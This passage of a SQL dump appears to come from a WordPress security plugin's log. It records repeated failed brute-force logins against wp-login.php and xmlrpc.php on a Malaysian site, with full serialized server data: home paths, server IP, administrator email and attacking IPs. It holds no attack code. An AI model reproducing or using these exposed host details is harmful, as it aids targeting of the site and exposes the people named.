Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"185.67.0.188\";s:11:\"REMOTE_PORT\";s:5:\"37670\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYE79iqbKGlf1IVly7N2LAAAAVc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568750582.6115\";s:12:\"REQUEST_TIME\";s:10:\"1568750582\";}}','notice','2019-09-17 20:03:04','2019-09-17 20:03:02',18255960,19554072,'https://bintara.com.my/xmlrpc.php',1,0,'185.67.0.188'),(24719,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.55.177\";s:11:\"REMOTE_PORT\";s:5:\"51992\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYE87yqbKGlf1IVly7N2cAAAAVU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568750831.5638\";s:12:\"REQUEST_TIME\";s:10:\"1568750831\";}}','notice','2019-09-17 20:07:13','2019-09-17 20:07:11',17740088,19229824,'https://bintara.com.my/wp-login.php',1,0,'157.230.55.177'),(24720,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.55.177\";s:11:\"REMOTE_PORT\";s:5:\"52406\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYE88o75s89pqgR69SLO1wAAAZg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568750834.712\";s:12:\"REQUEST_TIME\";s:10:\"1568750834\";}}','notice','2019-09-17 20:07:16','2019-09-17 20:07:15',18257360,19556920,'https://bintara.com.my/xmlrpc.php',1,0,'157.230.55.177'),(24721,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.99.168.27\";s:11:\"REMOTE_PORT\";s:5:\"49832\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYE9w475s89pqgR69SLPKgAAAZI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568751044.3631\";s:12:\"REQUEST_TIME\";s:10:\"1568751044\";}}','notice','2019-09-17 20:10:45','2019-09-17 20:10:44',17740096,19232072,'https://bintara.com.my/wp-login.php',1,0,'167.99.168.27'),(24722,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.99.168.27\";s:11:\"REMOTE_PORT\";s:5:\"50386\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYE9x475s89pqgR69SLPLAAAAZA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568751047.2236\";s:12:\"REQUEST_TIME\";s:10:\"1568751047\";}}','notice','2019-09-17 20:10:48','2019-09-17 20:10:47',18256992,19555784,'https://bintara.com.my/xmlrpc.php',1,0,'167.99.168.27'),(24723,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"188.166.158.153\";s:11:\"REMOTE_PORT\";s:5:\"34140\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFATyqbKGlf1IVly7N3CAAAAVQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568751696.3344\";s:12:\"REQUEST_TIME\";s:10:\"1568751696\";}}','notice','2019-09-17 20:21:37','2019-09-17 20:21:36',17739664,19230144,'https://bintara.com.my/wp-login.php',1,0,'188.166.158.153'),(24724,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"188.166.158.153\";s:11:\"REMOTE_PORT\";s:5:\"34682\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFAUyqbKGlf1IVly7N3CgAAAVA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568751700.0353\";s:12:\"REQUEST_TIME\";s:10:\"1568751700\";}}','notice','2019-09-17 20:21:41','2019-09-17 20:21:40',18257024,19555928,'https://bintara.com.my/xmlrpc.php',1,0,'188.166.158.153'),(24725,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"159.65.229.162\";s:11:\"REMOTE_PORT\";s:5:\"34698\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFAsSqbKGlf1IVly7N3GQAAAVc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568751793.7343\";s:12:\"REQUEST_TIME\";s:10:\"1568751793\";}}','notice','2019-09-17 20:23:14','2019-09-17 20:23:14',17740096,19230744,'https://bintara.com.my/wp-login.php',1,0,'159.65.229.162'),(24726,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"159.65.229.162\";s:11:\"REMOTE_PORT\";s:5:\"35858\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFAuW4SfF9g@8lNlxwghgAAAEM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568751801.5841\";s:12:\"REQUEST_TIME\";s:10:\"1568751801\";}}','notice','2019-09-17 20:23:23','2019-09-17 20:23:22',18256432,19556504,'https://bintara.com.my/xmlrpc.php',1,0,'159.65.229.162'),(24727,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 